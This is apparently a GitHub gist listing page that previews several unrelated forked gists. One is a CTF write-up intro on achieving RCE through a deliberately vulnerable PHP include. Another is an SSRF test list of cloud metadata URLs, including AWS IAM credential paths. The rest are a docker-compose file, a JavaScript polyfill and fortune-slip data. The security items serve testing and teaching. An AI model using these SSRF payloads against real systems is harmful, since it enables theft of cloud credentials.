maple maple3142

@maple3142
maple3142 / writeup.md
Created December 31, 2021 05:45 — forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files


The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the PHP installation to make sure that previously known solutions wouldn't work (for further information, read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@maple3142
maple3142 / cloud_metadata.txt
Created May 3, 2021 05:43 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
version: '3'
services:
  ide:
    image: chinodesuuu/coder:latest
    volumes:
      - /home/coder/projects
    ports:
      - '9000:9000'
      - '8888:8888'
@maple3142
maple3142 / onbeforescriptexecute.js
Last active July 7, 2020 00:58 — forked from jspenguin2017/onbeforescriptexecute.html
polyfill of 'beforescriptexecute' event
// 'beforescriptexecute' event [es5]
// original version: https://gist.github.com/jspenguin2017/cd568a50128c71e515738413cd09a890
;(function() {
;('use strict')
function Event(script, target) {
this.script = script
this.target = target
this._cancel = false
[
{
"id": "1",
"type": "大吉",
"poem": "七寶浮圖塔,高峰頂上安,眾人皆仰望,莫作等閒看",
"explain": "就像出現了用美麗寶石做成的佛塔般地,似乎會有非常好的事情。因為能改用放眼萬事的立場,可以得到周圍的人們的信賴吧。合乎正道的你的行為,能被很多人的認同及鼓勵。不用隨便的態度看事情,用正確的心思會招來更多的好的結果。",
"result": {
"願望": "會充分地實現吧。",
"疾病": "會治癒吧。",
"盼望的人": "會出現吧。",